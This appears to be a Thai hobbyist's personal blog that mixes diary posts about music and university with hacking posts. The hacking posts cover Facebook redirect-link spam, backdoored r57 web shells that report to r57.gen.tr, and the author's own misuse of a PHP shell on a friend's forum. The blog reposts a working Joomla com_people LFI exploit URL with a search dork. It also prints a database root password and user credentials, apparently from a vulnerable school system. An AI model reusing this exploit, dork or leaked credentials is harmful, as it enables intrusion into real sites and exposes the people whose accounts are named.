่ตอนนี้เริ่มมี สแปมเมอร์ที่ใช้ประโยชน์จากลิงค์เอ๊าท์ของเฟชบุคแร่ะ พอเวลาจะมีลิงค์ออกจะมี
http://www.facebook.com/l.php?u=Http://site.com
ทีนี้มันจะพาลิงค์ไปไวรัสแทน เพื่อความเนียล เรยใช้เฟชบุค นี่แหล่ะเป็นตัวล่อออกไป
โดยจะมีข้อความมาที่ fb chat ไห้เหยื่อหลงกดดูเล่นๆ
http://www.facebook.com/l.php?u=www.site.com/sexshop/buy.php?xxx=try2hack@msn.com
ประมาณนั้น แล้วจะคิดต่อไปเรื่อยๆ ตามคนที่หลงกด มันจะส่งไปต่อไปเรื่อย ใครจะกดลิงค์อะไรดูดีๆนะครับ
เราเตือนคุณแล้ว อิอิ จะโดนก๊อบไปไหนไม๊น่อ….
####################################################################
>>>>> Author : altbta [altbta@gmail.com]
>>>>> Home : [xp10.com]
>>>>> Script : Joomla Component com_people
>>>>> Bug Type : Local File Inclusion Vulnerability
>>>>> Dork : inurl:”/index.php?option=com_people”
>>>>> Vendor : http://www.ptt-solution.com
####################################################################
===[ Exploit ]=== [LFI]
http://site/index.php?option=com_people&controller=../../../../../../../../../../../../../../../../../../etc/passwd%00
####################################################################
RxH & ab0-3th4b & MeTo & R3d-D3v!L &*
DR_ALWALEED
referer -> http://www.exploit-db.com/exploits/16001/
*
ช่วงนี้รูปสึกว่าจะทำอะไรอย่างบ้าพลัง นึกครั่งกลับบ้านมาดีๆ โพสพรวดๆไห้ เซิพเวอร์ทำงานหนักขึ้นซะงั้น เออ่ วันอาทิตย์นี้แร่ะไปสอบ ม บูร บ้าไปแล้ว ต้องเอาเบสไปสอบด้วย เรียนเกี่ยวเกี่ยวกับดดนตรีนี่นา คือว่าๆที่จะไปนี่เพราะอยากรู้ว่ามันสอบไงว่ะนี้ ไม่เคยมีใครไปสอบแล้วมาเล่าไห้ฟังสะที มีรุ่นพี่โทรมา(น่าจะรู่นพี่นะ)บอกว่า “น้องตะเตรียมตัวมาดีๆนะคะ อ้อสอบเพลงพวก rock indy” อะไรเทือกนี้ แต่ผมว่าจะเอา เพลง coffe shop ไปสอบสะงั้น (เอามันหึๆ) เล่นจนเจ็บนิ้วแล้วยังมานั่งพิมพ์ต่อ (บล๊อกนี้มันดนตรีหรือคอมวะนี้ )
เนื่องจากเดี่ยวนี้โลกเราไม่มีอะไรที่เป็นของฟรี
พวกมือไหม่ที่มีฝีมือระดับหนึ่งจากเอา shell มาจากเวปนอก
ซึ่งไอ้ 99.99% นี้ไม่มีของฟรี มันจะมีของฟรีแถมมาด้วย
คือว่าเขาจะฝังสคริปมา เช่น
ส่วนไหนไม่รุ้ของไฟล์ที่เราโหลดมา พอเราเอาไฟล์ shell ที่เราไปโหลดมานั้นรับปุ๊ป ไอ้เวป r57.gen.tr ได้ทันทว่าเอาเอาไปวางไว้ไหน
ดูจากนี่ได้ ผมโหลดไฟล์ shell มาจาก http://r57.gen.tr/dq.rar จะมี
อยู่สองบรรทัดมั้ง ถ้าเราอยากไช้ไห้เราเอาออกครับ ถ้าไม่อยากไห้เขามาใช้กะเรา 
###############################################################
ถ้าจะถามว่าเขาทำได้อย่างไรนั้นไม่ยากครับ คือว่าในไฟล์ http://r57.gen.tr/yazciz/ciz.js เนี่ย
มัรมีสคริป คล้ายๆ xss อยู่
คือว่ามันจะเอา escape(location.href) แต่ xss เอา document.cookie จ่ะ
โดยมันจะมีไฟล์ รับค่าอยู่ แต่จะเก็บค่า location referer จ่ะ 
referer:http://www.thaishadow.com/board/index.php?topic=3317
<?php
$hostname = “localhost”;
$user = “root”;
$password = “pccl2010!++”;
$dbname = “social”;
?>
เท่าที่จำได้นะ ไม่รุ้แก้ไปยัง แต่ที่รู้ๆคือ ischool มี บัค
| people_pass | people_user |
| pccl2011! | pccl2011 |
ตอนนี้เป็นช่วงที่ผมใกล้จะจบ ม หกแร่ะ เรียนมาตั้งหลายปี ตั้งแต่อนุบาล ช่วงนี้เป็นช่วงที่สำคัญมากๆ คือว่าต้องมีมหาลัยดีๆ ไห้พ่อแม่พี่น้องเนี้ยเขาเอาไปคุยกันได้ว่า ลูกกุนี้เก่ง ซึ่งผมผลการเรียนนี้ไม่ค่อยดีสักเท่าไรนัก มีช่วง ม ห้า นี้ได้เริ่มเล่นดนตรี(อยากเป็นนักดนตรีล่ะ) เล่นเบส ครับ พอ ม หก อยากจะลองไปสอบ เข้าเรียนดนตรีมาก ทีนี้ล่ะ ได้เถียงกับที่บ้านเป็นการยกใหญ่ และเร็วๆนี้ จะไปสอบที่ ม บรู สมัครไปตั้งแต่ปีที่แล้วล่ะ แต้จริงๆแล้วตอนนี้มีมหาลัยเรียนแล้วล่ะ ที่แม่ฟ้าหลวง อยู่ที่เชียงราย หนาวโค๊ดๆ ไม่ได้ตั้งใจสอบสักเท่าไรหรอก แต่พอไปสอบจริงๆแล้วดันติดขึ้นมาสะอีก ด้วย คณะไอที สาขา การจัดการเทคโนโลยี เขาว่าจบมาแล้วมีการทำ มีรายได้ระหว่างเรียน อะไรจะขนาดนั้น ตอนนี้เลยชิวๆ ไม่เครียดเท่าไร เพราะอีกหลายๆคนต้องไปสอบกลางหรือ แอดมิชชั่นนั่นเอง แต่ผมไม่เสี่ยงอ่ะ แอด ทำไมเสี่ยงสึดๆ อิอิ ปล.ค่าลงทะเบียน 6000 บาท ออกโดยท่านพ่อ และค่าเทอมเทอมล่ะประมาณ 18000 ไหนจะค่ากินค่าอยู่อีก
อ่าได้เวลาเปิดบลอ๊กไหม่สะทีหลังจากห่างายไปนาน เนื่องจากไม่ค่อยมีโอกาสได้เขียนสักเท่าไร ตอนนี้มานึกคึกยังไงไม่รุ้เสียตังคืค่าโดเมนไปจำนวนหนึ่ง ซึ่งก้อได้เวปนี้มา ส่วนชื่อของเวปนี้ได้น้องพีเป็นผู้คิดไห้ ส่วนโฮสได้ความอนุโมทนามาจาก putter เจ้าเวปรักคอม แร่ะ http://www.ruk-om.in.th
พูดถึงเวปรักคอมเนี้ยผมรู้จักกันมาตั้งแต่เวปเขาสร้างมาไหม่ๆผ่านไปหลายยุคหลายสมัยจนหน้าตาเป็นแบบในตอนนี้ เรื่องมีอยู่ว่าเมื่อปีก่อน ผมได้จดโดนเมนเนมชื่อ try2hack.us ขึ้นมาแล้วไปอาศัยเขาอีกนั่นแหล่ะ แล้วดันไปอัพ phpshell ขึ้นไป แล้วซนดู แล้วไปแก้จำนวนโพสใน ruk-com แล้วพลาด (set ‘user’ 9999 id ‘try2hack’) ประมาณนี้ทำไห้ทุกๆไอดีในบอร์ดกลายเป็น try2hack 9999ซึ่งก้อได้รับการแก้ไขโดยรีสโตรเวปไหม่กันอีกรอบ ความปั่นป่วนและหนักใจกับทุกๆคนอย่างมาก เลยไม่กล้าที่จะไปซนโดยไม่ใช้สคริปที่ถูกต้อง -,,- จบ
